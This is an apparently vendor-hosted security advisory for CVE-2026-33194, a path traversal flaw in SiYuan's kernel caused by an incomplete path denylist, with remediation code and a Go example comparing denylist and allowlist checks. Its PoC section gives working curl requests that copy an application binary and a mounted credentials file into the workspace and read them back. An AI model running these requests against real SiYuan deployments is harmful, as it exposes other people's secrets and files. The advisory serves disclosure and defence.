CVE-2026-33194

CVE-2026-33194 is a medium-severity path traversal vulnerability in github.com/siyuan-note/siyuan/kernel (go), affecting versions <= 3.6.1. It is fixed in 3.6.2.

Summary

The IsSensitivePath() function in kernel/util/path.go uses a denylist approach that was recently expanded (GHSA-h5vh-m7fg-w5h6, commit 9914fd1) but remains incomplete. Multiple security-relevant Linux directories are not blocked, including /opt (application data), /usr (local configs/binaries), /home (other users), /mnt and /media (mounted volumes). The globalCopyFiles and importStdMd endpoints rely on IsSensitivePath as their primary defense against reading files outside the workspace.

Details

Current denylist in kernel/util/path.go:391-405:

prefixes := []string{
    "/.",       // dotfiles
    "/etc",     // system config
    "/root",    // root home
    "/var",     // variable data
    "/proc",    // process info
    "/sys",     // sysfs
    "/run",     // runtime data
    "/bin",     // binaries
    "/boot",    // boot files
    "/dev",     // devices
    "/lib",     // libraries
    "/srv",     // service data
    "/tmp",     // temp files
}

NOT blocked:

  • /opt: commonly contains application data, databases and credentials. In the SiYuan Docker image, /opt/siyuan/ contains the application itself.
  • /usr: contains /usr/local/etc, /usr/local/share and other custom configuration
  • /home: other users' home directories (only ~/.ssh and ~/.config under the current HomeDir are blocked by separate checks; other users' homes remain accessible)
  • /mnt and /media: mounted volumes and network shares, which often contain secrets
  • /snap: snap package data
  • /sbin and /lib64: system binaries and libraries

The globalCopyFiles endpoint at kernel/api/file.go:82 uses IsSensitivePath as its sole path validation:

if util.IsSensitivePath(absSrc) {
    // reject
    continue
}
// File is copied into workspace, then readable via /api/file/getFile

PoC

# Read SiYuan's own application files from /opt (Docker deployment)
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"srcs":["/opt/siyuan/kernel/SiYuan-Kernel"],"destDir":"data/assets"}'

# Then read the copied file from workspace
curl -s 'http://127.0.0.1:6806/api/file/getFile' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"path":"data/assets/SiYuan-Kernel"}'

# Read files from mounted volumes
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
  -H 'Authorization: Token YOUR_API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"srcs":["/mnt/secrets/credentials.json"],"destDir":"data/assets"}'

Impact

  • Read arbitrary files from /opt, /usr, /home, /mnt, /media and any other non-denylisted path
  • In Docker deployments: read application source code, configs, mounted secrets
  • The denylist approach is fundamentally flawed: any newly added filesystem path is accessible until it is explicitly blocked

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-33194 has a CVSS score of 6.8 (Medium). The vector is network-reachable, requires high privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.6.2); upgrading removes the vulnerable code path.

Affected versions

github.com/siyuan-note/siyuan/kernel (<= 3.6.1)

Security releases

github.com/siyuan-note/siyuan/kernel → 3.6.2 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Switch from a denylist to an allowlist approach. Only permit copying from the workspace directory and explicitly approved external paths:

package util

import (
    "path/filepath"
    "strings"
)

// WorkspaceDir is the absolute workspace root; the kernel sets it at startup.
var WorkspaceDir string

// hasPathPrefix reports whether p is dir itself or lies below it, comparing on
// path-segment boundaries so that "/data/ws-other" is not treated as inside "/data/ws".
func hasPathPrefix(p, dir string) bool {
    dir = filepath.Clean(dir)
    return p == dir || strings.HasPrefix(p, dir+string(filepath.Separator))
}

func IsSensitivePath(p string) bool {
    absPath := filepath.Clean(p) // callers pass an absolute path; Clean folds ".." segments

    // Allowlist: only workspace and configured safe directories
    if hasPathPrefix(absPath, WorkspaceDir) {
        // Block workspace-internal sensitive paths (conf/)
        if hasPathPrefix(absPath, filepath.Join(WorkspaceDir, "conf")) {
            return true
        }
        return false
    }

    // Everything outside workspace is sensitive by default
    return true
}
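The following is an added, self-contained Go example (not code from SiYuan or from this advisory) that puts the two policies side by side: a simplified model of the prefix denylist quoted under Details, and the workspace allowlist sketched above. It runs a constructed set of paths through both and reports which ones the denylist lets through but the allowlist rejects. The workspace root /siyuan/workspace, the candidate paths other than the two taken from the PoC, and the function names are assumptions chosen for illustration. It goes slightly beyond the advisory by also showing two edge cases an allowlist must handle: a sibling directory that shares the workspace name as a string prefix, and a ".." traversal that filepath.Clean folds away before the comparison.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// denyPrefixes mirrors the prefix list quoted from kernel/util/path.go above.
var denyPrefixes = []string{
	"/.", "/etc", "/root", "/var", "/proc", "/sys", "/run",
	"/bin", "/boot", "/dev", "/lib", "/srv", "/tmp",
}

// DenylistSensitive is a simplified model of the prefix-based check: a path
// counts as sensitive only if it begins with one of the denied prefixes.
func DenylistSensitive(p string) bool {
	p = filepath.Clean(p)
	for _, pre := range denyPrefixes {
		if strings.HasPrefix(p, pre) {
			return true
		}
	}
	return false
}

// insideDir reports whether p equals dir or lies below it, comparing on
// path-segment boundaries so "/x/ws-other" is not taken for a child of "/x/ws".
func insideDir(p, dir string) bool {
	dir = filepath.Clean(dir)
	return p == dir || strings.HasPrefix(p, dir+"/")
}

// AllowlistSensitive is the inverted policy: anything outside workspace, and
// the workspace's own conf/ tree, is sensitive. Cleaning the path first folds
// ".." segments so traversal cannot slip past the prefix comparison.
func AllowlistSensitive(p, workspace string) bool {
	abs := filepath.Clean(p)
	if !filepath.IsAbs(abs) {
		return true // relative input is rejected rather than guessed at
	}
	if !insideDir(abs, workspace) {
		return true
	}
	return insideDir(abs, filepath.Join(workspace, "conf"))
}

// Gaps returns the candidates the denylist lets through but the allowlist
// rejects: the coverage holes of the denylist.
func Gaps(candidates []string, workspace string) []string {
	var out []string
	for _, c := range candidates {
		if !DenylistSensitive(c) && AllowlistSensitive(c, workspace) {
			out = append(out, c)
		}
	}
	return out
}

// SampleWorkspace and SampleCandidates are constructed values, not taken from
// any real deployment.
const SampleWorkspace = "/siyuan/workspace"

var SampleCandidates = []string{
	"/opt/siyuan/kernel/SiYuan-Kernel",   // path used in the advisory's PoC
	"/mnt/secrets/credentials.json",      // path used in the advisory's PoC
	"/home/other/.ssh/id_rsa",            // another user's home, not denylisted
	"/etc/passwd",                        // already denylisted
	"/siyuan/workspace/data/assets/a.png", // legitimate workspace asset
	"/siyuan/workspace-evil/x",           // sibling dir sharing a string prefix
	"/siyuan/workspace/../../etc/shadow", // traversal; Clean yields /etc/shadow
}

func main() {
	for _, g := range Gaps(SampleCandidates, SampleWorkspace) {
		fmt.Printf("denylist allows, allowlist rejects: %s\n", g)
	}
}
```

Running it lists the /opt, /mnt and /home paths plus the /siyuan/workspace-evil sibling; the traversal case is caught by both policies only because the path is cleaned before comparison, and the workspace asset passes the allowlist while conf/ under the workspace does not. The segment-boundary check in insideDir is the detail most often missed when converting a denylist to an allowlist.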

Frequently Asked Questions

  1. What is CVE-2026-33194? CVE-2026-33194 is a medium-severity path traversal vulnerability in github.com/siyuan-note/siyuan/kernel (go), affecting versions <= 3.6.1. It is fixed in 3.6.2. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-33194? CVE-2026-33194 has a CVSS score of 6.8 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/siyuan-note/siyuan/kernel are affected by CVE-2026-33194? github.com/siyuan-note/siyuan/kernel (go) versions <= 3.6.1 are affected.
  4. Is there a fix for CVE-2026-33194? Yes. CVE-2026-33194 is fixed in 3.6.2. Upgrade to this version or later.
  5. Is CVE-2026-33194 exploitable, and should I be worried? Whether CVE-2026-33194 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33194 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33194? Upgrade github.com/siyuan-note/siyuan/kernel to 3.6.2 or later.

Other vulnerabilities in github.com/siyuan-note/siyuan/kernel

CVE-2026-45375
CVE-2026-45371
CVE-2026-45148
CVE-2026-45147
CVE-2026-44588
